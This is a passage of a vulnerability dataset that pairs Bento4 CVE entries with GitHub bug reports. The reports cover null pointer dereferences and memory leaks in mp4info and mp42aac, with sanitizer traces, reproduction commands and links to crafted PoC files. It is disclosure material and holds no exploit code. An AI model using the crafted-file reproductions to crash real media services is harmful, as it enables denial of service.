0x7fece57fb082 in __libc_start_main ../csu/libc-start.c:308 #8 0x564f30a377ed in _start (/home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/build/mp4info+0x447ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StszAtom.cpp:154 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==973817==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721177/poc-file.txt)
NULL pointer reference from AP4_StszAtom::GetSampleSize() in v1.6.0-640
https://api.github.com/repos/axiomatic-systems/Bento4/issues/874/comments
1
2023-06-12T10:08:57Z
2024-02-17T17:33:31Z
https://github.com/axiomatic-systems/Bento4/issues/874
1,752,392,145
874
[ -0.01246784906834364, 0.010809417814016342, -0.005797105375677347, 0.019264455884695053, 0.01967906393110752, 0.00018659664783626795, -0.05372132360935211, 0.0399504229426384, -0.008381000719964504, 0.03094751015305519, -0.010387405753135681, 0.014222527854144573, 0.033287081867456436, 0.0...
1,117
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : NULL pointer reference from AP4_StszAtom::GetSampleSize() in v1.6.0-640 Issue date: --- start body --- Hi, There still exists the null pointer reference bug in the latest version (1.6.0-640) of mp4info by the function AP4_StszAtom::GetSampleSize(). Here is the output of program with address sanitizer attached. ### Bug Report File: major brand: isom minor version: 200 compatible brand: isom compatible brand: iso2 compatible brand: avc1 compatible brand: mp41 fast start: yes Movie: duration: 4960 (media timescale units) duration: 4960 (ms) time scale: 1000 fragments: no Found 1 Tracks Track 1: flags: 15 ENABLED IN-MOVIE IN-PREVIEW id: 1 type: Video duration: 4960 ms language: eng media: sample count: 16449660 timescale: 25 duration: 124 (media timescale units) duration: 4960 (ms) AddressSanitizer:DEADLYSIGNAL ==973817==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564f30ae87de bp 0x7ffd3baf13c0 sp 0x7ffd3baf13c0 T0) ==973817==The signal is caused by a READ memory access. ==973817==Hint: address points to the zero page. #0 0x564f30ae87dd in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StszAtom.cpp:154 #1 0x564f30b193c1 in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4AtomSampleTable.cpp:162 #2 0x564f30a3993d in ScanMedia /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1270 #3 0x564f30a422ad in ShowTrackInfo_Text /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1331 #4 0x564f30a422ad in ShowTrackInfo /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475 #5 0x564f30a42b42 in ShowTracks /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586 #6 0x564f30a336f4 in main /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868 #7 0x7fece57fb082 in __libc_start_main ../csu/libc-start.c:308 #8 0x564f30a377ed in _start (/home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/build/mp4info+0x447ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StszAtom.cpp:154 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==973817==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721177/poc-file.txt) --- end body --- comments : --- start comments --- --- end comments ---
2,992
CVE-2024-25454
2024-02-09T15:15:09.293
Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_DescriptorFinder::Test() function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/875" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-640:*:*:*:*:*:*:*", "matchCriteriaId": "8C7DB535-F27C-455F-9E99-3EF80B828022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "Exploit", "Issue Tracking" ]
[ "axiomatic-systems", "Bento4" ]
Issue
Hi, There still exists the null pointer reference bug in the latest version (1.6.0-640) of mp4info by the function AP4_DescriptorFinder::Test(). Here is the output of program with address sanitizer attached. ### Bug Report File: major brand: isom minor version: 200 compatible brand: isom compatible brand: iso2 compatible brand: avc1 compatible brand: mp41 fast start: yes Movie: duration: 4637 (media timescale units) duration: 4637 (ms) time scale: 1000 fragments: no Found 2 Tracks Track 1: flags: 3 ENABLED IN-MOVIE id: 1 type: Video duration: 4600 ms language: eng media: sample count: 138 timescale: 15360 duration: 70656 (media timescale units) duration: 4600 (ms) bitrate (computed): 6623656.562 Kbps display width: 480.000000 display height: 480.000000 frame rate (computed): 30.000 Sample Description 0 Coding: avc1 (H.264) Codec String: avc1.42C01E AVC Profile: 66 (Baseline) AVC Profile Compat: c0 AVC Level: 30 AVC NALU Length Size: 4 AVC SPS: [6742c01eda0783db0110000003001000000303c0f162ea] AVC PPS: [68ce092c80] Width: 480 Height: 480 Depth: 24 Track 2: flags: 3 ENABLED IN-MOVIE id: 2 type: Audio duration: 4673 ms language: eng media: sample count: 200 timescale: 44100 duration: 206060 (media timescale units) duration: 4673 (ms) bitrate (computed): 28737.402 Kbps AddressSanitizer:DEADLYSIGNAL ================================================================= ==973829==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x56038ea4c20e bp 0x7ffdee3bfe40 sp 0x7ffdee3bfdc0 T0) ==973829==The signal is caused by a READ memory access. ==973829==Hint: address points to the zero page. #0 0x56038ea4c20d in AP4_DescriptorFinder::Test(AP4_Descriptor*) const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4Descriptor.h:92 #1 0x56038ea4c20d in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4List.h:431 #2 0x56038ea4c20d in AP4_EsDescriptor::GetDecoderConfigDescriptor() const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4EsDescriptor.cpp:207 #3 0x56038e9e0f2e in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleDescription.cpp:886 #4 0x56038e9e1566 in AP4_MpegAudioSampleDescription::AP4_MpegAudioSampleDescription(unsigned int, unsigned short, unsigned short, AP4_EsdsAtom*) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleDescription.cpp:1000 #5 0x56038e9e4cd3 in AP4_MpegAudioSampleEntry::ToSampleDescription() /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:678 #6 0x56038e9f8a2c in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:181 #7 0x56038e95544e in ShowTrackInfo_Text /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1351 #8 0x56038e95544e in ShowTrackInfo /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475 #9 0x56038e955b42 in ShowTracks /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586 #10 0x56038e9466f4 in main /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868 #11 0x7fe97e71a082 in __libc_start_main ../csu/libc-start.c:308 #12 0x56038e94a7ed in _start (/home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/build/mp4info+0x447ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4Descriptor.h:92 in AP4_DescriptorFinder::Test(AP4_Descriptor*) const ==973829==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721209/poc-file.txt)
NULL pointer reference from AP4_DescriptorFinder::Test() in v1.6.0-640
https://api.github.com/repos/axiomatic-systems/Bento4/issues/875/comments
1
2023-06-12T10:12:34Z
2024-02-17T17:30:47Z
https://github.com/axiomatic-systems/Bento4/issues/875
1,752,398,555
875
[ -0.004776338115334511, 0.0205055084079504, -0.005664608906954527, 0.0084461010992527, 0.023486483842134476, 0.005423721857368946, -0.05880654230713844, 0.033152077347040176, -0.013391812331974506, 0.03408551216125488, -0.014137056656181812, 0.009808618575334549, 0.027521342039108276, 0.012...
1,118
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : NULL pointer reference from AP4_DescriptorFinder::Test() in v1.6.0-640 Issue date: --- start body --- Hi, There still exists the null pointer reference bug in the latest version (1.6.0-640) of mp4info by the function AP4_DescriptorFinder::Test(). Here is the output of program with address sanitizer attached. ### Bug Report File: major brand: isom minor version: 200 compatible brand: isom compatible brand: iso2 compatible brand: avc1 compatible brand: mp41 fast start: yes Movie: duration: 4637 (media timescale units) duration: 4637 (ms) time scale: 1000 fragments: no Found 2 Tracks Track 1: flags: 3 ENABLED IN-MOVIE id: 1 type: Video duration: 4600 ms language: eng media: sample count: 138 timescale: 15360 duration: 70656 (media timescale units) duration: 4600 (ms) bitrate (computed): 6623656.562 Kbps display width: 480.000000 display height: 480.000000 frame rate (computed): 30.000 Sample Description 0 Coding: avc1 (H.264) Codec String: avc1.42C01E AVC Profile: 66 (Baseline) AVC Profile Compat: c0 AVC Level: 30 AVC NALU Length Size: 4 AVC SPS: [6742c01eda0783db0110000003001000000303c0f162ea] AVC PPS: [68ce092c80] Width: 480 Height: 480 Depth: 24 Track 2: flags: 3 ENABLED IN-MOVIE id: 2 type: Audio duration: 4673 ms language: eng media: sample count: 200 timescale: 44100 duration: 206060 (media timescale units) duration: 4673 (ms) bitrate (computed): 28737.402 Kbps AddressSanitizer:DEADLYSIGNAL ================================================================= ==973829==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x56038ea4c20e bp 0x7ffdee3bfe40 sp 0x7ffdee3bfdc0 T0) ==973829==The signal is caused by a READ memory access. ==973829==Hint: address points to the zero page. #0 0x56038ea4c20d in AP4_DescriptorFinder::Test(AP4_Descriptor*) const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4Descriptor.h:92 #1 0x56038ea4c20d in AP4_List<AP4_Descriptor>::Find(AP4_List<AP4_Descriptor>::Item::Finder const&, AP4_Descriptor*&) const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4List.h:431 #2 0x56038ea4c20d in AP4_EsDescriptor::GetDecoderConfigDescriptor() const /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4EsDescriptor.cpp:207 #3 0x56038e9e0f2e in AP4_MpegSampleDescription::AP4_MpegSampleDescription(unsigned int, AP4_EsdsAtom*) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleDescription.cpp:886 #4 0x56038e9e1566 in AP4_MpegAudioSampleDescription::AP4_MpegAudioSampleDescription(unsigned int, unsigned short, unsigned short, AP4_EsdsAtom*) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleDescription.cpp:1000 #5 0x56038e9e4cd3 in AP4_MpegAudioSampleEntry::ToSampleDescription() /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4SampleEntry.cpp:678 #6 0x56038e9f8a2c in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4StsdAtom.cpp:181 #7 0x56038e95544e in ShowTrackInfo_Text /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1351 #8 0x56038e95544e in ShowTrackInfo /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1475 #9 0x56038e955b42 in ShowTracks /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1586 #10 0x56038e9466f4 in main /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Apps/Mp4Info/Mp4Info.cpp:1868 #11 0x7fe97e71a082 in __libc_start_main ../csu/libc-start.c:308 #12 0x56038e94a7ed in _start (/home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/build/mp4info+0x447ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/ubuntu/targets/Bento4-1.6.0-639_sanitizer/Source/C++/Core/Ap4Descriptor.h:92 in AP4_DescriptorFinder::Test(AP4_Descriptor*) const ==973829==ABORTING ### Envionment OS: Ubuntu 20.04.5 LTS x86_64 Release: v1.6.0-640 Program: mp4info ### How to reproduce $ mp4info poc-file poc-file is attached. [poc-file.txt](https://github.com/axiomatic-systems/Bento4/files/11721209/poc-file.txt) --- end body --- comments : --- start comments --- --- end comments ---
4,683
CVE-2024-24155
2024-02-29T01:44:11.810
Bento4 v1.5.1-628 contains a Memory leak on AP4_Movie::AP4_Movie, parsing tracks and added into m_Tracks list, but mp42aac cannot correctly delete when we got an no audio track found error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/axiomatic-systems/Bento4/issues/919" } ]
null
null
[ "axiomatic-systems", "Bento4" ]
Issue
### Envrionment ```bash ubuntu  ~/lab/Bento4-clean/cmakebuild  ◈ v1.5.1-628  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/Bento4-clean/cmakebuild  ◈ v1.5.1-628  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix InstalledDir: /usr/bin Found candidate GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11 Selected GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11 Candidate multilib: .;@m64 Selected multilib: .;@m64 ``` ### Step to reproduce ```bash git clone https://github.com/axiomatic-systems/Bento4.git -b v1.5.1-628 pushd Bento4 mkdir cmakebuild pushd cmakebuild cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_FLAGS_RELEASE="-fsanitize=address -fno-inline" .. make mp4aac poc.mp4 out ``` ### Affected Version Bento4 v1.5.1-628 (https://github.com/axiomatic-systems/Bento4/tree/v1.5.1-628) ### Contents of PoC file [poc.zip](https://github.com/axiomatic-systems/Bento4/files/13929540/poc.zip) ### Current Behavior * stderr (Given by ASAN) ``` ERROR: no audio track found ================================================================= ==29053==ERROR: LeakSanitizer: detected memory leaks Direct leak of 64 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ec9a341 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:108:27 #2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5 #3 0x55cf6ec89c8e in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 Indirect leak of 176 byte(s) in 2 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ecdcff5 in AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Track.cpp:242:25 Indirect leak of 48 byte(s) in 2 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca4bec in AP4_List<AP4_Track>::Add(AP4_Track*) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4List.h:160:16 Indirect leak of 48 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ed1eac1 in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ubuntu/lab/Bento4_AFL/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:175:14 #2 0x55cf6ec89b79 in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:236:14 #3 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 Indirect leak of 40 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28 Indirect leak of 40 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6eca3029 in AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4Movie.cpp:114:28 #2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5 #3 0x55cf6ec89c8e in main /home/ubuntu/lab/Bento4_AFL/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #4 0x7f3f8e9ddd8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: 416 byte(s) leaked in 8 allocation(s). ``` * stderr (valgrind) ``` ==8898== Memcheck, a memory error detector ==8898== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==8898== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info ==8898== Command: ./mp42aac /home/ubuntu/lab/Bento4/crashes/id_000006,sig_06,src_000004,time_55114263,execs_1191083,op_flip1,pos_1217 out ==8898== ERROR: no audio track found ==8898== ==8898== HEAP SUMMARY: ==8898== in use at exit: 888 bytes in 9 blocks ==8898== total heap usage: 200 allocs, 191 frees, 93,975 bytes allocated ==8898== ==8898== 48 bytes in 1 blocks are indirectly lost in loss record 1 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x192D1E: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 48 bytes in 2 blocks are indirectly lost in loss record 2 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x175298: AP4_List<AP4_Track>::Add(AP4_Track*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x174AED: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 80 bytes in 2 blocks are indirectly lost in loss record 3 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x174AB8: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 176 bytes in 2 blocks are indirectly lost in loss record 4 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x184E1D: AP4_Track::AP4_Track(AP4_TrakAtom&, AP4_ByteStream&, unsigned int) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x174AD2: AP4_Movie::AP4_Movie(AP4_MoovAtom*, AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172FC7: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 416 (64 direct, 352 indirect) bytes in 1 blocks are definitely lost in loss record 5 of 6 ==8898== at 0x4849013: operator new(unsigned long) (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x172FAD: AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x172DE6: AP4_File::AP4_File(AP4_ByteStream&, bool) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FF07: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== 472 bytes in 1 blocks are still reachable in loss record 6 of 6 ==8898== at 0x4848899: malloc (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so) ==8898== by 0x4B2C64D: __fopen_internal (iofopen.c:65) ==8898== by 0x4B2C64D: fopen@@GLIBC_2.2.5 (iofopen.c:86) ==8898== by 0x192B2A: fopen_s(_IO_FILE**, char const*, char const*) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x192C58: AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x193178: AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== by 0x16FE68: main (in /home/ubuntu/lab/Bento4-clean/cmakebuild/mp42aac) ==8898== ==8898== LEAK SUMMARY: ==8898== definitely lost: 64 bytes in 1 blocks ==8898== indirectly lost: 352 bytes in 7 blocks ==8898== possibly lost: 0 bytes in 0 blocks ==8898== still reachable: 472 bytes in 1 blocks ==8898== suppressed: 0 bytes in 0 blocks ==8898== ==8898== For lists of detected and suppressed errors, rerun with: -s ==8898== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) ``` ### Analysis https://github.com/axiomatic-systems/Bento4/blob/1529b83f89d52958b811469fc3ac5206639a3d0f/Source/C%2B%2B/Core/Ap4Movie.cpp#L117-L123 On `AP4_Movie::AP4_Movie`, parsing tracks and added into m_Tracks list, but it seems that mp42aac cannot correctly delete when we got an `no audio track found` error. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted mp4 file.
Memory leaks in mp42aac on adding / deleting AP4_Track::AP4_Tracks
https://api.github.com/repos/axiomatic-systems/Bento4/issues/919/comments
1
2024-01-13T21:23:38Z
2024-02-21T22:47:29Z
https://github.com/axiomatic-systems/Bento4/issues/919
2,080,480,764
919
[ -0.026192614808678627, 0.01679377444088459, -0.017928728833794594, -0.002063754480332136, 0.01087959948927164, 0.008640725165605545, -0.04380213841795921, 0.019755296409130096, -0.016031228005886078, 0.03497077524662018, 0.01044512540102005, 0.03055509552359581, 0.024082308635115623, 0.000...
1,119
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Memory leaks in mp42aac on adding / deleting AP4_Track::AP4_Tracks Issue date: --- start body --- ### Envrionment ```bash ubuntu  ~/lab/Bento4-clean/cmakebuild  ◈ v1.5.1-628  lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 22.04.2 LTS Release: 22.04 Codename: jammy ``` ### Compiler ```bash ubuntu  ~/lab/Bento4-clean/cmakebuild  ◈ v1.5.1-628  clang -v Ubuntu clang version 14.0.0-1ubuntu1.1 Target: x86_64-pc-linux-gnu Thread model: posix InstalledDir: /usr/bin Found candidate GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11 Selected GCC installation: /usr/bin/../lib/gcc/x86_64-linux-gnu/11 Candidate multilib: .;@m64 Selected multilib: .;@m64 ``` ### Step to reproduce ```bash git clone https://github.com/axiomatic-systems/Bento4.git -b v1.5.1-628 pushd Bento4 mkdir cmakebuild pushd cmakebuild cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_CXX_FLAGS_RELEASE="-fsanitize=address -fno-inline" .. make mp4aac poc.mp4 out ``` ### Affected Version Bento4 v1.5.1-628 (https://github.com/axiomatic-systems/Bento4/tree/v1.5.1-628) ### Contents of PoC file [poc.zip](https://github.com/axiomatic-systems/Bento4/files/13929540/poc.zip) ### Current Behavior * stderr (Given by ASAN) ``` ERROR: no audio track found ================================================================= ==29053==ERROR: LeakSanitizer: detected memory leaks Direct leak of 64 byte(s) in 1 object(s) allocated from: #0 0x55cf6ec8723d in operator new(unsigned long) (/home/ubuntu/lab/Bento4_AFL/cmakebuild/mp42aac+0x16223d) (BuildId: ffe7bbaa2d49eb5a6b20555c850617a61dc43049) #1 0x55cf6ec9a341 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:108:27 #2 0x55cf6ec9aa78 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/ubuntu/lab/Bento4_AFL/Source/C++/Core/Ap4File.cpp:78:5 #3 0x55cf6ec89c8e in main 